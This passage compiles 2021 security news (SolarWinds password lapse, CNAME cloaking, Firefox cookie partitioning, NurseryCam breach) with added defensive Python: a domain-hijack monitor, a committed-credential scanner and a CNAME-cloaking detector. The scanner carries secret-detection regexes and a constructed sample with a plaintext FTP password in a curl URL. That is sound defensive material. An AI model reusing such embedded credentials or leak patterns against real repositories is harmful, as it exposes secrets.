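TRANSFER_LOCKS = {"clientTransferProhibited", "serverTransferProhibited"}
ICANN_TRANSFER_LOCK_DAYS = 60   # transfer lock after a registrant contact change

# Constructed snapshots, one per poll: contact change and lock removal, then a
# registrar move plus renewal after the lock lapses, then a second registrar move.
SNAPSHOTS = [
    {"seen": "2020-09-01", "record": {
        "registrar": "Registrar A", "registrant_email": "owner@example.org",
        "nameservers": ["ns1.example.org", "ns2.example.org"],
        "status": ["clientTransferProhibited", "clientUpdateProhibited"],
        "expiration": "2021-03-01"}},
    {"seen": "2020-09-20", "record": {
        "registrar": "Registrar A", "registrant_email": "newowner@example.net",
        "nameservers": ["ns1.example.org", "ns2.example.org"],
        "status": ["ok"],
        "expiration": "2021-03-01"}},
    {"seen": "2020-12-20", "record": {
        "registrar": "Registrar B", "registrant_email": "newowner@example.net",
        "nameservers": ["ns1.parked.example", "ns2.parked.example"],
        "status": ["ok"],
        "expiration": "2023-03-01"}},
    {"seen": "2021-01-25", "record": {
        "registrar": "Registrar C", "registrant_email": "newowner@example.net",
        "nameservers": ["ns1.parked.example", "ns2.parked.example"],
        "status": ["ok"],
        "expiration": "2023-03-01"}},
]


def diff_records(old, new):
    """Alerts for the changes between two snapshots of one domain."""
    alerts = []
    if old["registrar"] != new["registrar"]:
        alerts.append(f"registrar changed: {old['registrar']} -> {new['registrar']}")
    if old["registrant_email"] != new["registrant_email"]:
        alerts.append("registrant contact changed: "
                      f"{old['registrant_email']} -> {new['registrant_email']}")
    if set(old["nameservers"]) != set(new["nameservers"]):
        alerts.append(f"nameservers changed: {sorted(new['nameservers'])}")
    dropped = (set(old["status"]) & TRANSFER_LOCKS) - set(new["status"])
    if dropped:
        alerts.append(f"transfer lock removed: {sorted(dropped)}")
    if date.fromisoformat(new["expiration"]) > date.fromisoformat(old["expiration"]):
        alerts.append(f"expiration extended: {old['expiration']} -> {new['expiration']}")
    return alerts


def timeline(snapshots):
    """Diff consecutive snapshots; return [(date, alerts)] for every poll that
    changed something. A registrar move is annotated with the days elapsed
    since the last contact change, because a hijacker has to wait out the
    ICANN lock before the domain can be moved."""
    out = []
    last_contact_change = None
    for prev, cur in zip(snapshots, snapshots[1:]):
        alerts = diff_records(prev["record"], cur["record"])
        if any(a.startswith("registrant contact changed") for a in alerts):
            last_contact_change = cur["seen"]
        if last_contact_change and any(a.startswith("registrar changed") for a in alerts):
            gap = (date.fromisoformat(cur["seen"]) - date.fromisoformat(last_contact_change)).days
            state = "expired" if gap >= ICANN_TRANSFER_LOCK_DAYS else "still in force"
            alerts.append(f"registrar move {gap} days after contact change (60-day lock {state})")
        if alerts:
            out.append((cur["seen"], alerts))
    return out


if __name__ == "__main__":
    for seen, alerts in timeline(SNAPSHOTS):
        print(seen)
        for a in alerts:
            print("  -", a)
```

In practice the snapshots come from a scheduled RDAP or WHOIS query against the registry, and the first alert worth paging on is the contact change or the dropped transfer lock, not the registrar move that follows two months later; by then the domain has already left the original registrar.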
Dairy Giant Lactalis Targeted by Hackers
3.3.2021 Hacking Securityweek
France-based dairy giant Lactalis revealed last week that it was targeted by hackers, but claimed that it had found no evidence of a data breach.
The company said a malicious third party attempted to breach its computer network, but it immediately took action to contain the attack. This included restricting access to public resources.
Authorities have been notified and Lactalis’ IT team has been working with external cybersecurity experts to investigate the incident. However, the company said it did not appear that any data was compromised.
SecurityWeek has reached out to Lactalis for more information and will update this article if the company responds.
Based on the limited information made public by the company, this could be a ransomware attack conducted by a threat actor that — in addition to encrypting files on the compromised network — steals potentially sensitive files and threatens to leak them unless a ransom is paid.
Lactalis is one of the largest dairy product groups in the world, delivering more than 2,000 types of products — including famous brands such as Président and Galbani — to more than 100 countries. The company employs roughly 85,000 people and has operations in over 50 countries.
Intern caused ‘solarwinds123’ password leak, former SolarWinds CEO says
2.3.2021 Hacking Securityaffairs
Top executives of the software firm SolarWinds blamed an intern for having used a weak password for several years, exposing the company to attack.
Top executives of SolarWinds believe that the root cause of the recently disclosed supply chain attack was an intern who used a weak password for several years.
Initial investigation suggested that the password “solarwinds123” had been publicly accessible via a misconfigured GitHub repository since June 17, 2018; the issue was addressed on November 22, 2019.
In December, security researcher Vinoth Kumar revealed that he had notified the company of a publicly accessible GitHub repository that was leaking the FTP credentials of the company’s download website in clear text. An attacker could have used these credentials to upload tainted updates to the company’s download site.
New details emerged during a hearing before the House Committees on Oversight and Reform and Homeland Security, where CEO Sudhakar Ramakrishna confirmed that the password had been in use as early as 2017.
A preliminary investigation revealed that the threat actors behind the SolarWinds attack compromised the SolarWinds Orion supply chain as early as October 2019, but CrowdStrike’s researchers later dated the initial compromise to September 4, 2019.
“I’ve got a stronger password than ‘solarwinds123’ to stop my kids from watching too much YouTube on their iPad,” Representative Katie Porter of California said. “You and your company were supposed to be preventing the Russians from reading Defense Department emails.”
“I believe that was a password that an intern used on one of his servers back in 2017 which was reported to our security team and it was immediately removed,” Ramakrishna said in response to Porter.
The investigators don’t exclude the use of stolen credentials and brute-force attacks as possible attack vectors.
Confronted by Rep. Rashida Tlaib, former SolarWinds CEO Kevin Thompson declared that the password issue was “a mistake that an intern made.” “They violated our password policies and they posted that password on an internal, on their own private Github account,” Thompson explained. “As soon as it was identified and brought to the attention of my security team, they took that down.”
According to SolarWinds, up to 18,000 customers may have been impacted by the supply chain attack, including prominent IT and security firms (Microsoft, FireEye, Malwarebytes, CrowdStrike, and Mimecast), several government agencies (the Departments of State, Justice, Commerce, Homeland Security, Energy, and Treasury, and the National Institutes of Health), the National Aeronautics and Space Administration (NASA), and the Federal Aviation Administration (FAA).
“In addition to this estimate, we have identified additional government and private sector victims in other countries, and we believe it is highly likely that there remain other victims not yet identified, perhaps especially in regions where cloud migration is not as far advanced as it is in the United States,” Microsoft President Brad Smith said during the hearing.
Experts pointed out that the attackers are very advanced and did their best to remain under the radar, for example by launching the attack from inside the United States to cover their activities.
SolarWinds Blames Intern for 'solarwinds123' Password Lapse
2.3.2021 Hacking Thehackernews
As cybersecurity researchers continue to piece together the sprawling SolarWinds supply chain attack, top executives of the Texas-based software services firm blamed an intern for a critical password lapse that went unnoticed for several years.
The said password "solarwinds123" was originally believed to have been publicly accessible via a GitHub repository since June 17, 2018, before the misconfiguration was addressed on November 22, 2019.
But in a hearing before the House Committees on Oversight and Reform and Homeland Security on SolarWinds on Friday, CEO Sudhakar Ramakrishna testified that the password had been in use as early as 2017.
While a preliminary investigation into the attack revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, Crowdstrike's incident response efforts pointed to a revised timeline that established the first breach of SolarWinds network on September 4, 2019.
To date, at least nine government agencies and 100 private sector companies have been breached in what's being described as one of the most sophisticated and well-planned operations that involved injecting the malicious implant into the Orion Software Platform with the goal of compromising its customers.
"A mistake that an intern made."
"I've got a stronger password than 'solarwinds123' to stop my kids from watching too much YouTube on their iPad," Representative Katie Porter of California said. "You and your company were supposed to be preventing the Russians from reading Defense Department emails."
"I believe that was a password that an intern used on one of his servers back in 2017 which was reported to our security team and it was immediately removed," Ramakrishna said in response to Porter.
Former CEO Kevin Thompson echoed Ramakrishna's statement during the testimony. "That related to a mistake that an intern made, and they violated our password policies and they posted that password on their own private GitHub account," Thompson said. "As soon as it was identified and brought to the attention of my security team, they took that down."
Security researcher Vinoth Kumar disclosed in December that he notified the company of a publicly accessible GitHub repository that was leaking the FTP credentials of the company's download website in the clear, adding a hacker could use the credentials to upload a malicious executable and add it to a SolarWinds update.
In the weeks following the revelation, SolarWinds was hit with a class-action lawsuit in January 2021 that alleged the company failed to disclose that "since mid-2020, SolarWinds Orion monitoring products had a vulnerability that allowed hackers to compromise the server upon which the products ran," and that "SolarWinds' update server had an easily accessible password of 'solarwinds123'," as a result of which the company "would suffer significant reputational harm."
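Both accounts above (the Security Affairs and The Hacker News articles) turn on the same two failures: FTP credentials for the download site sitting in clear text in a public repository, and the password itself being a company name plus digits. As an added example, not SolarWinds' tooling or the researcher's method, the following scanner finds credentials committed in the clear and rates each one against a weak-password heuristic. The sample file contents, the regexes and the heuristic are assumptions constructed for the demo.

```python
"""Added example: a small scanner for credentials committed in the clear,
run over constructed file contents. Patterns, file names and the weak-password
heuristic are assumptions for the demo, not SolarWinds' repository or policy."""
import re

# Constructed sample repository: a deployment script with the FTP password
# inline, a shell script with the password embedded in a URL, and a README
# that merely names the variable (must not be flagged).
SAMPLE_FILES = {
    "deploy/upload.ps1": (
        "$ftpUser = 'uploader'\n"
        "$ftpPass = 'solarwinds123'\n"
        "# push build artifacts to the download server\n"
    ),
    "scripts/sync.sh": (
        "#!/bin/sh\n"
        "curl -T build.msi ftp://uploader:solarwinds123@downloads.example.com/pub/\n"
    ),
    "README.md": "Set FTP_PASSWORD in the environment before running sync.sh.\n",
}

# user:password@host inside a URL
CREDENTIAL_URL = re.compile(r"\b(?:ftps?|sftp|https?)://([^\s/:@]+):([^\s@/]+)@[^\s/]+", re.I)
# an identifier containing pass/pwd/secret/token assigned a quoted literal
SECRET_ASSIGNMENT = re.compile(
    r"""(?i)\$?\w*(?:pass(?:word)?|pwd|secret|token)\w*\s*[=:]\s*['"]([^'"]{4,})['"]""")


def redact(secret):
    """Keep enough to recognise the finding without reproducing the secret."""
    return secret[:2] + "*" * (len(secret) - 2)


def weak_password_reasons(secret, org_names=("solarwinds",)):
    """Heuristics for passwords that would fail an obvious review."""
    reasons = []
    low = secret.lower()
    if any(low.startswith(o) and low[len(o):].isdigit() for o in org_names):
        reasons.append("organisation name plus digits")
    if len(secret) < 12:
        reasons.append("shorter than 12 characters")
    if re.fullmatch(r"[a-z]+\d{1,4}", low):
        reasons.append("single word followed by a short digit run")
    return reasons


def scan(files):
    """Return one finding per credential match: path, line, kind, the secret,
    a redacted form for reports, and the weak-password reasons (empty if none)."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for m in CREDENTIAL_URL.finditer(line):
                findings.append((path, lineno, "credential in URL", m.group(2)))
            for m in SECRET_ASSIGNMENT.finditer(line):
                findings.append((path, lineno, "secret assignment", m.group(1)))
    return [
        {"path": p, "line": n, "kind": k, "secret": s,
         "redacted": redact(s), "weak": weak_password_reasons(s)}
        for p, n, k, s in findings
    ]


if __name__ == "__main__":
    for f in scan(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']}: {f['kind']} {f['redacted']}"
              + (f" (weak: {', '.join(f['weak'])})" if f["weak"] else ""))
```

Run over every commit rather than only the current tree: a credential removed in a later commit, as this one was, stays in the history of any public clone. Reports should carry the redacted form only, so the scanner's own output does not become a second copy of the leak.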
NASA and FAA Also Targeted
Up to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the threat actor behind the operation carefully chose their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on intel amassed during an initial reconnaissance of the target environment for high-value accounts and assets.
Besides infiltrating the networks of Microsoft, FireEye, Malwarebytes, and Mimecast, the attackers are also said to have used SolarWinds as a jumping-off point to penetrate the National Aeronautics and Space Administration (NASA) and the Federal Aviation Administration (FAA), according to the Washington Post.
The seven other breached agencies are the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.
"In addition to this estimate, we have identified additional government and private sector victims in other countries, and we believe it is highly likely that there remain other victims not yet identified, perhaps especially in regions where cloud migration is not as far advanced as it is in the United States," Microsoft President Brad Smith said during the hearing.
The threat group, alleged to be of Russian origin, is being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Dark Halo (Volexity).
"The hackers launched the hack from inside the United States, which further made it difficult for the U.S. government to observe their activity," Deputy National Security Advisor Anne Neuberger said in a White House briefing last month. "This is a sophisticated actor who did their best to hide their tracks. We believe it took them months to plan and execute this compromise."
Adopting a "Secure by Design" Approach
Likening the SolarWinds cyberattack to a "large-scale series of home invasions," Smith urged the need for strengthening the tech sector's software and hardware supply chains, and promoting broader sharing of threat intelligence for real-time responses during such incidents.
To that effect, Microsoft has open-sourced CodeQL queries used to hunt for Solorigate activity, which it says could be used by other organizations to analyze their source code at scale and check for indicators of compromise (IoCs) and coding patterns associated with the attack.
In a related development, cybersecurity researchers speaking to The Wall Street Journal disclosed that the suspected Russian hackers used Amazon's cloud-computing data centers to mount a key part of the campaign, throwing fresh light on the scope of the attacks and the tactics employed by the group. The tech giant, however, has so far not made its insights into the hacking activity public.
SolarWinds, for its part, said it's implementing the knowledge gained from the incident to evolve into a company that is "Secure by Design" and that it's deploying additional threat protection and threat hunting software across all its network endpoints including measures to safeguard its development environments.
Microsoft Releases Open Source Resources for Solorigate Threat Hunting
27.2.2021 Hacking Securityweek
Microsoft on Thursday announced the open source availability of CodeQL queries that it used during its investigation into the SolarWinds attack.
Believed to be sponsored by Russia, the attackers hacked into the systems of IT management solutions firm SolarWinds in 2019 and, using the Sunspot malware, inserted the Sunburst backdoor into the SolarWinds Orion monitoring product.
Thus, thousands of organizations worldwide were eventually infected with Sunburst, but the attackers only delivered additional malware to a few hundred victims of interest. The attackers also used hands-on-keyboard techniques to compromise systems at these organizations.
Microsoft, which tracks the attacks as Solorigate, has published several reports to provide information on the employed techniques, the attackers, and the scope of the incident, and this week decided to make some of the tools used in its investigation available to other companies as well.
The company has released the source code of CodeQL queries, which it used to analyze its code at scale and identify any code-level indicators of compromise (IoCs) associated with Solorigate.
“We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries […] simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality,” the company says.
Microsoft also underlines that manual review is still required to confirm the results, and that the threat actor may use different functionality and coding style in other operations, meaning the queries will not detect implants that deviate significantly from the Solorigate code.
The tech company also explains that it chose to work with CodeQL for this analysis because the engine allows for the creation of “a database that captures the model of the compiling code,” which can then be queried repeatedly.
Microsoft has made C# queries meant for the assessment of code-level IoCs available in the CodeQL GitHub repository, with detailed information on each query and the code-level IoCs it attempts to find available in the Solorigate-Readme.md. Guidance on making adjustments is also included.
“GitHub will shortly publish guidance on how they are deploying these queries for existing CodeQL customers. As a reminder, CodeQL is free for open-source projects hosted by GitHub,” Microsoft also notes.
The company also explains that, while investigating Solorigate, on the one hand it looked for syntax associated with code-level IoCs, while on the other it investigated overall semantic patterns of the techniques in those IoCs. Thus, detection would catch scenarios where techniques changed but syntax didn’t, or the other way around.
“Because it’s possible that the malicious actor could change both syntax and techniques, CodeQL was but one part of our larger investigative effort,” the tech giant notes.
Mozilla Patches Bugs in Firefox, Now Blocks Cross-Site Cookie Tracking
25.2.2021 Hacking Threatpost
Mozilla said its Total Cookie Protection feature in Firefox 86 prevents invasive, cross-site cookie tracking.
The Mozilla Foundation has released its latest version of the Firefox browser, which comes with new privacy protections to squash cross-site cookie tracking, as well as a slew of security vulnerability fixes.
Firefox 86, released on Tuesday, includes what it touts as a privacy-bolstering feature called Total Cookie Protection. This new feature isolates each cookie assigned by each website – preventing websites from tracking internet users in an invasive, cross-site manner.
“Total Cookie Protection confines cookies to the site where they were created, which prevents tracking companies from using these cookies to track your browsing from site to site,” said Tim Huang, Johann Hofmann and Arthur Edelstein with Mozilla on Tuesday.
Cookies: Busting Privacy Problems
HTTP cookies are small data files stored by web browsers while users are perusing various websites. These are used as a unique identifier to improve web browsing experience and enable user-specific ads – a necessary part of the internet economy.
However, tracking cookies can also pose a “serious privacy vulnerability,” said Mozilla, because third-party companies – like data brokers, affiliate networks and advertising networks – can use them to track users’ browser activity – even when they visit other websites. Advertisers can then use the tracking cookies to better understand which websites that users visit – whether those are social media websites or otherwise – and ultimately piece together a digital picture of who users are. Those details can also be transferred to a third party and stored on remote servers.
“This type of cookie-based tracking has long been the most prevalent method for gathering intelligence on users,” said Huang, Hofmann and Edelstein. “It’s a key component of the mass commercial tracking that allows advertising companies to quietly build a detailed personal profile of you.”
Firefox Total Cookie Protection
Total Cookie Protection aims to rein in some of these privacy concerns by creating what Mozilla calls a separate “cookie jar” for each website that a user visits.
Each time a user visits a website, the website (or third-party content embedded in the website) will deposit the cookie in the user’s browser. That cookie is then confined to the “cookie jar” assigned to that website – but it is not allowed to be shared with any other website. This would prevent invasive cross-site tracking by various third-party companies.
Mozilla said that Total Cookie Protection does make “a limited exception” for cross-site cookies when they are needed for non-tracking purposes – including those used by popular third-party login providers.
“Only when Total Cookie Protection detects that you intend to use a provider, will it give that provider permission to use a cross-site cookie specifically for the site you’re currently visiting,” said Huang, Hofmann and Edelstein. “Such momentary exceptions allow for strong privacy protection without affecting your browsing experience.”
Browsers Taking Cookie-Tracking Privacy Measures
Mozilla has been on a war path against tracking cookies since 2018, when it announced a campaign to block tracking cookies by default in Firefox and to implement various other privacy measures in its browser. In October 2018, for instance, Firefox rolled out (off-by-default) Enhanced Tracking Protection features, which gave users the option to block cookies and storage access from third-party trackers.
Other browsers have offered their own tactics for combating the privacy holes introduced by tracking cookies. Google, for instance, in 2020 set an aggressive two-year deadline for dropping support for third-party tracking cookies in its Chrome web browser. And Apple in March 2020 released an update to its Safari browser that blocks third-party cookies by default.
Mozilla Firefox 86 Security Fixes
Firefox 86 also comes with three security fixes for high-severity flaws. Two of these flaws exist in the Content Security Policy (CSP), a security mechanism for browsers that prevents cross-site scripting, clickjacking and other code injection attacks. The first vulnerability (CVE-2021-23969) could allow a remote attacker to obtain sensitive data. In the process of creating a violation report for CSP, Firefox’s implementation of the process incorrectly set the source file to be the destination of the redirects.
“By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to obtain the destination of a redirect,” according to an analysis by vulnerability search engine Vulmon.
Mozilla’s fix sets the source file in the violation report to the origin of the redirect destination rather than to the full destination URL.
Another flaw (CVE-2021-23968) stems from the CSP violation report process. While details regarding this flaw are scant, Mozilla said that the vulnerability can be used to leak sensitive information contained in Uniform Resource Identifiers (URIs).
“If Content Security Policy blocked frame navigation, the full destination of a redirect served in the frame was reported in the violation report; as opposed to the original frame URI,” according to Mozilla.
Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
25.2.2021 Hacking Thehackernews
With browser makers steadily clamping down on third-party tracking, advertising technology companies are increasingly embracing a DNS technique to evade such defenses, thereby posing a threat to web security and privacy.
Called CNAME Cloaking, the practice of blurring the distinction between first-party and third-party cookies not only results in leaking sensitive private information without users' knowledge and consent but also "increases [the] web security threat surface," said a group of researchers Yana Dimova, Gunes Acar, Lukasz Olejnik, Wouter Joosen, and Tom Van Goethem in a new study.
"This tracking scheme takes advantage of a CNAME record on a subdomain such that it is same-site to the including web site," the researchers said in the paper. "As such, defenses that block third-party cookies are rendered ineffective."
The findings are expected to be presented in July at the 21st Privacy Enhancing Technologies Symposium (PETS 2021).
Rise of Anti-Tracking Measures
Over the past four years, all major browsers, with the notable exception of Google Chrome, have included countermeasures to curb third-party tracking.
Apple set the ball rolling with a Safari feature called Intelligent Tracking Protection (ITP) in June 2017, setting a new privacy standard on desktop and mobile to reduce cross-site tracking by "further limiting cookies and other website data." Two years later, the iPhone maker outlined a separate plan dubbed "Privacy Preserving Ad Click Attribution" to make online ads private.
Mozilla then began blocking third-party cookies in Firefox by default as of September 2019 through a feature called Enhanced Tracking Protection (ETP), and in January 2020, Microsoft's Chromium-based Edge browser followed suit. Subsequently, in late March 2020, Apple updated ITP with full third-party cookie blocking, among other features aimed at thwarting login fingerprinting.
Although Google early last year announced plans to phase out third-party cookies and trackers in Chrome in favor of a new framework called the "privacy sandbox," it's not expected to go live until some time in 2022.
In the meantime, the search giant has been actively working with ad tech companies on a proposed replacement called "Dovekey" that looks to supplant the functionality served by cross-site tracking using privacy-centered technologies to serve personalized ads on the web.
CNAME Cloaking as an Anti-Tracking Evasion Scheme
In the face of these cookie-killing barriers to enhance privacy, marketers have begun looking for alternative ways to evade the absolutist stance taken by browser makers against cross-site tracking.
Enter canonical name (CNAME) cloaking, where websites use first-party subdomains as aliases for third-party tracking domains via CNAME records in their DNS configuration in order to circumvent tracker-blockers.
CNAME records in DNS allow for mapping a domain or subdomain to another (i.e., an alias), thus making them an ideal means to smuggle tracking code under the guise of a first-party subdomain.
"This means a site owner can configure one of their subdomains, such as sub.blog.example, to resolve to thirdParty.example, before resolving to an IP address," WebKit security engineer John Wilander explains. "This happens underneath the web layer and is called CNAME cloaking — the thirdParty.example domain is cloaked as sub.blog.example and thus has the same powers as the true first-party."
In other words, CNAME cloaking makes tracking code look like it is first-party when in fact it is not: the first-party subdomain resolves, through a CNAME record, to a host under the tracker's own domain, which is exactly what a browser checking only the hostname of the request never sees.
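The two mechanisms above, per-site cookie partitioning (the Total Cookie Protection model described earlier) and the CNAME trick that slips past it, are modelled in this added example. It is not Mozilla's code or the researchers' tooling: the zone records, the tracker list, the toy public-suffix table and the cookie jar contents are all constructed assumptions. It resolves a CNAME chain the way a Firefox extension can through the browser's DNS API, decides whether a subresource is first-party, third-party or cloaked, and then applies RFC 6265 domain matching to show which first-party cookies a request to the cloaked subdomain carries to the tracker.

```python
"""Per-site cookie partitioning (the Total Cookie Protection model) next to a
CNAME-cloaking check.  Added example with constructed data; the zone records,
tracker list and public-suffix table below are assumptions, not data from
Mozilla or from the PETS 2021 paper."""
from dataclasses import dataclass

# Constructed DNS data: the publisher aliases one of its subdomains to a tracker.
CNAME_RECORDS = {
    "metrics.blog.example": "blog-example.tracker-cdn.example",
    "blog-example.tracker-cdn.example": "ingest.tracker.example",
    "www.blog.example": "blog.example",                  # legitimate same-site alias
    "static.blog.example": "d123.cdn-provider.example",  # third party, not a known tracker
}
KNOWN_TRACKERS = {"tracker.example"}
# Toy public-suffix table; real code must use the full Public Suffix List.
PUBLIC_SUFFIXES = {"example", "com", "co.uk"}


def registrable_domain(host):
    """eTLD+1 of host (what 'same-site' is judged on), or None if host is a public suffix."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):  # first hit is the longest matching suffix
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return None if i == 0 else ".".join(labels[i - 1:])
    return ".".join(labels[-2:])


def resolve_chain(host, records=CNAME_RECORDS, max_hops=8):
    """Follow CNAME aliases, as a Firefox extension can through the browser DNS API."""
    chain = [host]
    while chain[-1] in records and len(chain) <= max_hops:
        nxt = records[chain[-1]]
        if nxt in chain:
            raise ValueError("CNAME loop at " + nxt)
        chain.append(nxt)
    return chain


def classify(top_level_host, subresource_host):
    """first-party, third-party, or CNAME-cloaked (same-site by name, third party by DNS)."""
    site = registrable_domain(top_level_host)
    if registrable_domain(subresource_host) != site:
        return {"verdict": "third-party", "chain": [subresource_host]}
    chain = resolve_chain(subresource_host)
    target = registrable_domain(chain[-1])
    if target == site:
        return {"verdict": "first-party", "chain": chain}
    verdict = "cname-cloaked-tracker" if target in KNOWN_TRACKERS else "cname-to-third-party"
    return {"verdict": verdict, "chain": chain}


@dataclass
class Cookie:
    name: str
    domain: str            # Domain attribute, or the setting host for a host-only cookie
    host_only: bool = False


def cookies_for(request_host, jar):
    """RFC 6265 domain matching: the cookies a request to request_host would carry."""
    h = request_host.lower()
    sent = []
    for c in jar:
        d = c.domain.lower().lstrip(".")
        match = (h == d) if c.host_only else (h == d or h.endswith("." + d))
        if match:
            sent.append(c.name)
    return sent


class PartitionedJar:
    """One cookie jar per top-level site the cookie was set under."""
    def __init__(self):
        self.jars = {}

    def store(self, top_level_host, cookie):
        self.jars.setdefault(registrable_domain(top_level_host), []).append(cookie)

    def cookies_for(self, top_level_host, request_host):
        return cookies_for(request_host, self.jars.get(registrable_domain(top_level_host), []))


def demo():
    jar = PartitionedJar()
    # tracker.example sets an identifier while embedded as a third party on news.example
    jar.store("news.example", Cookie("uid", "tracker.example"))
    # blog.example sets a host-only session cookie and a domain-wide profile cookie
    jar.store("blog.example", Cookie("sessionid", "blog.example", host_only=True))
    jar.store("blog.example", Cookie("user_email", ".blog.example"))
    return {
        # partitioning works: the uid set under news.example is invisible under blog.example
        "uid_seen_on_news": "uid" in jar.cookies_for("news.example", "ingest.tracker.example"),
        "uid_seen_on_blog": "uid" in jar.cookies_for("blog.example", "ingest.tracker.example"),
        # cloaking bypasses it: metrics.blog.example is same-site, so domain cookies go to the tracker
        "cloaked": classify("blog.example", "metrics.blog.example"),
        "leaked_to_tracker": jar.cookies_for("blog.example", "metrics.blog.example"),
    }


if __name__ == "__main__":
    print(demo())
```

The host-only session cookie stays put, but any cookie scoped to the whole registrable domain rides along to metrics.blog.example and therefore to ingest.tracker.example, which is the shape of leak the researchers describe. Note the two different answers: `classify` is what a CNAME-aware blocker needs (a DNS lookup before the request leaves), while `PartitionedJar` shows why partitioning alone cannot help, since to the browser the request is same-site.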
Not surprisingly, this tracking scheme is rapidly gaining traction, growing by 21% over the past 22 months.
Cookies Leak Sensitive Information to Trackers
The researchers, in their study, found this technique to be used on 9.98% of the top 10,000 websites, in addition to uncovering 13 providers of such tracking "services" on 10,474 websites.
What's more, the study cites a "targeted treatment of Apple's web browser Safari" wherein ad tech company Criteo switched specifically to CNAME cloaking to bypass privacy protections in the browser.
Given that Apple has already rolled out some lifespan-based defenses for CNAME cloaking, this finding is likely to be more reflective of devices that don't run iOS 14 and macOS Big Sur, which support the feature.
Perhaps the most troubling of the revelations is that cookie data leaks were found on 7,377 sites (95%) out of the 7,797 sites that used CNAME tracking, all of which sent cookies containing private information such as full names, locations, email addresses, and even the authentication cookies to trackers of other domains without the user's explicit affirmation.
"It is actually ridiculous even, because why would the user consent to a third-party tracker receiving totally unrelated data, including of sensitive and private nature?," asks Olejnik.
With many CNAME trackers included over HTTP as opposed to HTTPS, the researchers also raise the possibility that a request sending analytics data to the tracker could be intercepted by a malicious adversary in what's a man-in-the-middle (MitM) attack.
Furthermore, the increased attack surface posed by including a tracker as same-site could expose the data of a website's visitors to session fixation and cross-site scripting attacks, they caution.
The researchers said they worked with the tracker developers to address the aforementioned issues.
Mitigating CNAME Cloaking
While Firefox doesn't ban CNAME cloaking out of the box, users can download an add-on like uBlock Origin to block such sneaky first-party trackers. Incidentally, the company yesterday began rolling out Firefox 86 with Total Cookie Protection that prevents cross-site tracking by "confin[ing] all cookies from each website in a separate cookie jar."
On the other hand, Apple's iOS 14 and macOS Big Sur come with additional safeguards that build on ITP to defend against third-party CNAME cloaking, although they do not offer a means to unmask the tracker domain and block it outright.
"ITP now detects third-party CNAME cloaking requests and caps the expiry of any cookies set in the HTTP response to seven days," Wilander detailed in a write-up in November 2020.
Brave also defends against CNAME cloaking, although last week it had to ship emergency fixes for a bug introduced by its CNAME-based ad-blocking feature, which sent queries for .onion domains to public internet DNS resolvers rather than through Tor.
Chrome (and by extension, other Chromium-based browsers) is the only glaring omission, as it neither blocks CNAME cloaking natively nor makes it easy for third-party extensions to resolve DNS queries by fetching the CNAME records before a request is sent unlike Firefox.
"The emerging CNAME tracking technique [...] evades anti-tracking measures," Olejnik said. "It introduces serious security and privacy issues. User data is leaking, persistently and consistently, without user awareness or consent. This likely triggers GDPR and ePrivacy related clauses."
"In a way, this is the new low," he added.
Daycare Webcam Service Exposes 12,000 User Accounts
24.2.2021 Hacking Threatpost
NurseryCam suspends service across 40 daycare centers until a security fix is in place.
NurseryCam, a webcam service used across 40 daycare centers in the U.K. by parents who want to keep a watchful eye on their babies, has shut down following a data breach. The breach exposed the personal data of about 12,000 users to an attacker who said he or she was trying to improve the service’s security.
The attacker was able to find a “loophole” in the system, according to reports; NurseryCam was said to be alerted to the breach last Friday afternoon, prompting the company to send a notice to its users. By Saturday, the NurseryCam service was shut down while a fix is being sorted out.
The person behind the attack told the Register that they were able to get real names, usernames, email addresses and encrypted passwords for 12,000 accounts and dump them online.
NurseryCam told the BBC that it doesn’t believe anyone watched the webcam without permission; instead, the director for NurseryCam and sister companies Meta Technologies and FootfallCam, Melissa Kao, told BBC the person behind the breach contacted the company to report the incident.
“He stated he has no intention to use this to do any harm [and] wants to see NurseryCam raise the overall standards of our security measures,” she said.
NurseryCam’s Well-Known Vulnerabilities
This latest incident comes after the company was given repeated warnings by users and infosec professionals that their internet-of-things (IoT) system’s security was deeply flawed.
IoT security researcher Andrew Tierney has been raising the alarm about NurseryCam’s security dating back to 2015, when it became clear that the IP address, username and password for the DVR in the daycare center, “are leaked in the HTML source when viewing the cameras using ActiveX,” he wrote.
In January, Tierney reported that the usernames and passwords given to parents to access the remote video baby monitor are all very similar to one another if not exactly the same in some cases. That means that whoever had access at one time or another could access live streams indefinitely.
Further, he warned that the system is not protected with TLS to encrypt the nursery’s video streams, and that the service shared administrator usernames and passwords with parents, with credentials used across multiple nurseries.
“This is analogous to your local bank giving you the keys to their vault and just trusting that you will only take your money,” Tierney told Bitdefender.
Several months later, another parent reported that the admin username and password were visible in the browser. And just days ago, Tierney reported that another parent said they had been issued the same username and password as in 2015.
“I disclosed the same issue in NurseryCam, inferred from the reverse engineering of their mobile app,” Tierney said. “Once a parent had confirmed the issues had been disclosed previously, I publicly disclosed immediately.”
The Register spoke with a business customer of FootfallCam who asked not to be identified, but said, “Over the four years we have had the devices we have highlighted some other issues to FootfallCam,” the customer told The Register. “At one point the FTP server which houses the ‘verification videos’ was publicly available.”
Parents who use the NurseryCam service told The Register they had reported vulnerabilities to the company, some were addressed, while others felt the response was inadequate.
Tierney told BBC he was also contacted by the attacker who stole NurseryCam’s user data last Friday, and that he reached out to the company to offer his assistance. Kao told BBC she did not think the vulnerabilities previously reported by Tierney had anything to do with the latest breach.
“NurseryCam sincerely apologizes to all our parent users and nurseries for the incident. We are very sorry,” she said.
An attacker was able to siphon audio feeds from multiple Clubhouse rooms
23.2.2021 Hacking Securityaffairs
An attacker demonstrated this week that Clubhouse chats are not secure: they were able to siphon audio feeds from “multiple rooms” into their own website.
While the popularity of the audio chatroom app Clubhouse continues to grow, experts are questioning the security and privacy it offers its users.
